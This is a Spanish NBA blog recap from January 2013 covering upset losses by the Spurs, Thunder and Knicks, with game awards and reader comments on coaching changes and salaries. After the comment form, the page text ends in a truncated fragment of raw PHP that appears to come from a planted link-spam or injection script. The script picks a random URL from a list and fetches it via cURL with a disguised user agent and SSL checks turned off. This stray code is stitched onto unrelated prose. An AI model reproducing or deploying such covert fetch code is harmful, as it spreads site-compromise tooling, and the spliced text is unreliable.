La Crónica: Sorpresas

08 de January de 2013 por Simon

Volvemos definitivamente a la rutina en TJNBA tras las navidades con una jornada de 7 partidos en la que cayeron los 3 mejores equipos que entraban en acción anoche. 2 de ellos, San Antonio y Oklahoma, a manos de los dos colistas de la liga y el tercero, New York, ante un Play Off “pelado”  como es actualmente Boston Celtics.

El partido de la jornada era sin duda el que llevaba a Boston Celtics al Madison Square Garden para enfrentarse a los Knicks con la baja de su base estrella, Rajon Rondo. El partido transcurrió  muy igualado en todas sus fases y con ambos equipos tomándoselo como si fuera un partido de Play Off pero en los minutos finales ni Anthony ni Smith estuvieron acertados por lo que el encuentro acabó decantándose del lado céltico. Durante todo el choque Carmelo Anthony y Kevin Garnett mantuvieron un pique que desembocó en algo más al final del partido en los vestuarios. No ha trascendido más pero la liga está investigando el incidente y Anthony podría ser sancionado. Volviendo al partido, el mejor fue Pierce bien apoyado por Kevin Garnett y desde el banco por Jeff Green. Carmelo Anthony tuvo un mal día como demuestra su 6/26 en tiros de campo (102-96).

Oklahoma cayó donde nadie esperaba, en Washington, como ya hicieran los Heat a principio de temporada. Los colistas de la liga sorprendieron a los Thunder con un gran primer cuarto pero Durant y compañía se encargaron de igualar el partido y mantenerlo así hasta mediados del último cuarto, en que los Wizards se volvieron a escapar de 8 puntos. A falta de 2 minutos Oklahoma consiguió igualar de nuevo el partido pero un 3+1 de Webster volvía a dar ventaja a Washington. Una canasta de Ibaka y un triple de Durant igualaban el partido a falta de 30 segundos. En la última jugada, el rookie Bradley Beal anotó la canasta ganadora tras una increíble finta para evitar a Sefolosha y Perkins y anotar su primer buzzer beater. Durant e Ibaka acabaron con 29 y 26 puntos respectivamente.  En Washington 5 jugadores consiguieron dobles dígitos en los que destacan los 22 puntos de Bradley Beal (99-101). 

San Antonio Spurs completó el trío de sorpresas de la noche perdiendo ante el colista del Oeste. Los Hornets comenzaron  el partido muy enchufados y pronto consiguieron las primeras ventajas del partido. Movieron el balón muy bien durante toda la noche, lo que volvió loca a la defensa de Popovich. El duelo generacional entre Tim Duncan y Anthony Davis, el número 1 del pasado draft, se saldó con 13 puntos y 8 rebotes del primero y 17 puntos y 9 rebotes del segundo. New Orleans es otro equipo con la entrada de Eric Gordon, autor anoche de 24 puntos, que aporta ese killer instinct que necesitaban los Hornets. Lástima que haya vuelto cuando New Orleans tiene perdida la temporada (88-95).

Por su parte, Chicago venció en casa a Cleveland Cavaliers. Tras un gran primer cuarto para los Cavs, Chicago reaccionó en los tres siguientes para acabar propinándoles una verdadera paliza. Boozer sigue en un estado de forma brutal y se fue a los 24 puntos y 11 rebotes en tan solo 29 minutos de juego. Noah aportó 11 puntos y otros tantos rebotes y Gibson desde el banquillo terminó con 18 puntos y 7 rebotes para formar un trío de internos imparables para Cleveland  (92-118).

Utah hizo valer su localía para vencer a unos Mavericks inmersos en una grave crisis tras perder 9 de sus últimos 10 partidos a pesar de la vuelta de Dirk Nowitzki.  Los Mavs estuvieron prácticamente todo el partido por delante aunque sin tomar ventajas superiores a los 5 puntos pero un gran último cuarto de los Jazz los catapultó  a la victoria ante un supuesto rival directo por los Play Off. Hayward fue el mejor de los Jazz con 27 puntos (94-100).

En el resto de la jornada Memphis Grizzlies destrozó a Sacramento Kings en la segunda parte.  Wayne Ellington tuvo un día acertadísimo con 6 triples en 7 intentos para acabar con 26 puntos y hasta 5 jugadores más de los Grizzlies acabaron en dobles dígitos. Rudy Gay, en cambio, se quedo en solo 8 puntos (113-81). Por último, Portland venció tras una prórroga a Orlando Magic en un partido igualadísimo en la segunda mitad en la que todos los titulares Blazers acabaron con más de 15 puntos y 42 minutos.  Por parte de los Magic, Redick fue el mejor con 29 puntos con 6 triples (119-125).

PREMIOS

MVP: Gordon Hayward se salió por todos los lados. 24 puntos, 6 rebotes, 5 asistencias, 1 robo y 2 tapones completaron una actuación completísima del jugador de los Jazz.

Rookie: Dice mucho más esa última canasta de Bradley Beal que los 22 puntos, 5 rebotes y 4 asistencias que consiguió. Va poco a poco pero aquí hay madera. El que ya ha demostrado sobradamente que la tiene es Damian Lillard. Anoche consiguió otro doble-doble con 18 puntos y 10 asistencias.

Sorpresa: Wesley Matthews lleva unos partidos muy entonado. Anoche también anotó más de 20 puntos que complementó con 3 reboets, 4 asistencias, 1 robo y 2 tapones. De todas maneras, los 26 puntos con un 10 de 11 en tiros de campo y 6 de 7 en triples de Wayne Ellington se llevan el premio.

Decepción: Mala noche, muy mala noche de Kevin Martin. Acabó con 8 puntos tras fallar los 6 triples que intentó. Rudy Gay también se quedó en 8 puntos y Jimmer Fredette ni se estrenó ya que falló los 7 lanzamientos que intentó.

Esfuerzo en vano: 29 puntos, 7 rebotes, 8 asistencias, 3 robos y derrota. No le pasará muchas veces más a Kevin Durant.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

12 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Cesado Scott Skiles (de mutuo acuerdo). Dijo en una entrevista que “odiaba a su equipo”.

    ¿Quién irá a los Bucks? ¿McMillan, Van Gundy, Mike Brown, Avery Johnson?

      Citar

  2. Ruxixón dice:
    #2

    Jose Luis:
    Cesado Scott Skiles (de mutuo acuerdo). Dijo en una entrevista que “odiaba a su equipo”.

    ¿Quién irá a los Bucks? ¿McMillan, Van Gundy, Mike Brown, Avery Johnson?

    Han confirmado al segundo de a bordo hasta final de temporada;no recuerdo su nombre ahora,algo así como Boylan.

    Parece que Beal despierta de su pésimo inicio de temporada,veremos si se consolida en este nivel de juego -que es el que se le “exigía”- ,si es así buenas noticias para los WIzards.

      Citar

  3. Esteban dice:
    #3

    comparto con lo de BEAL, esta jugando como se esperaba que hiciera, y cuando vuelva wall creo que mejorara aun mas
    puede ser interesante ver a los wizards con nene y wall ayudando a beal, mas teniendo en cuenta que cada tanto okafor se sale, y ayer le dio alto tapon a un tal DURANT

    eric GORDON ha sido destruido aqui por sus lesiones y es entendible, en dos años apenas se a puesto los cortos, pero cada veaz que juega, no importa el tiempo de inactividad que traiga demuestra que es de otro nivel, junto con harden deben ser los dos mejores escoltas de la liga pensando en un par de años cuando d-way y the black mamba no esten mas

      Citar

  4. Jose Luis dice:
    #4

    Mmm el segundo de a bordo… Suena a tankeo y reconstrucción, al menos a esto último. Jennings y Ellis creo que acaban contrato… Veremos

      Citar

  5. Simon dice:
    #5

    Jose Luis:
    Mmm el segundo de a bordo… Suena a tankeo y reconstrucción, al menos a esto último. Jennings y Ellis creo que acaban contrato… Veremos

    Lo han puesto de momento, mientras buscan un nuevo entrenador, muy pronto para hacer tankeo pienso yo vamos… y mas que aun dejandose llevar esta temporada no van a conseguir ( si la suerte no lo remedia ) entrar con garantias para llevarse un top 5 del draft… y habitualmente mas allá de eso es raro poder sacar alguien sobre el que reconstruir, y más el año que viene que (parece) va a ser un draft verdaderamente flojo.

      Citar

  6. Jose Luis dice:
    #6

    Ellis tiene una opción de jugador que seguro no ejercerá, y a Jennings pueden extenderle la Qualifying offer y después igualar. Estoy seguro de que alguien sobrepagará a Jennings, veremos si igualan (que lo dudo).

      Citar

  7. Jose Luis dice:
    #7

    Wow los Bucks liberan para el año próximo 8 millones de Udrih y 7 de Dalembert… una pena el contrato de Gooden, pues aunque Ellis firmase su Player Option, si no renuevan a Jennings se quedan en 40 millones solo, unos 18 bajo el tope (sin Ellis serían 29 y 29).

      Citar

  8. Denise dice:
    #8

    Jose Luis:
    Estoy seguro de que alguien sobrepagará a Jennings, veremos si igualan (que lo dudo).

    Lo malo de los mercados pequeños como Milwaukee es precisamente eso, que si quieres renovar a tu estrella o fichar agentes libres, tienes que pagarles un pastizal para convencerlos de que renueven o fichen por los Bucks. Yo supongo que Ellis no ejecutará su opción, y en cambio Jennings renovará siendo sobrepagado y probablemente entre en la lista de los 25 jugadores mejores pagados de la NBA.

    Por cierto, echando un ojo a los cuadros de salarios de los equipos para el año que viene, ojo con Mark Cuban y sus Dallas, que no me extrañarian que le plantasen una buena oferta al señor Howard en sus narices. Dallas tiene muuuucho espacio salarial y Howard si podría combinar perfectamente con un 4 mas abierto como Nowitzki.

      Citar

  9. Jose Luis dice:
    #9

    Por cierto, suena que los Grizzlies no quieren pagar el impuesto de lujo y piensan tradear a Rudy Gay.

      Citar

  10. Ekos dice:
    #10

    Hace dos horas los Bucks confirmaron por Twitter que el tal Boylan es el entrenador para el resto de la temporada.

      Citar

  11. nba dice:
    #11

    Wow Sacre ya me tiene ganado para la causa…, si sigue asi que siga siendo titular,menuda noche mas horrorosa de Asik, quien iba a decir que Kobe se iba a tirar solo lo que debia …,
    esta visto que los Lakers siguen igual que siempre regalando las victorias por no defender el perimetro

      Citar

  12. GreenPride dice:
    #12

    Bueno pues partido de PO en New York y continúa el renacimiento de los Celtics. Para mí uno de los mejores partidos que he visto esta temporada. Parece que la vuelta de Bradley ha devuelto la energía y la defensa a los de Boston que han ganado consecutivamente a Pacers en casa y Hawks y Knicks fuera (esta sin Rondo). Todo el equipo parece ahora comprometido en la defensa a muerte y con una rotación tan amplia pueden permitírselo. Con Garnett y sobre todo Pierce a este nivel los Celtics podrían volver a contar pronto como potencia del Este. Esta vez hicieron una gran defensa sobre Carmelo que además entro al choque con un maestro del pique como KG lo que no le benefició nada. Eso y un poco de magia de Pierce sirvieron para asaltar el Madison. Cada vez mejor Sullinger que demuestra que es un jugador muy válido y el equipo intentando paliar su mala capacidad reboteadora consiguiéndolo a ratos. Sólo queda que Jet Terry encuentre su lanzamiento porque sigue bastante negado. En los Knicks a parte del mal partido de Melo, mucha lucha y bien en triples pero no pudieron con la buena defensa de Boston. Por cierto, horrible partido de Prigioni.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>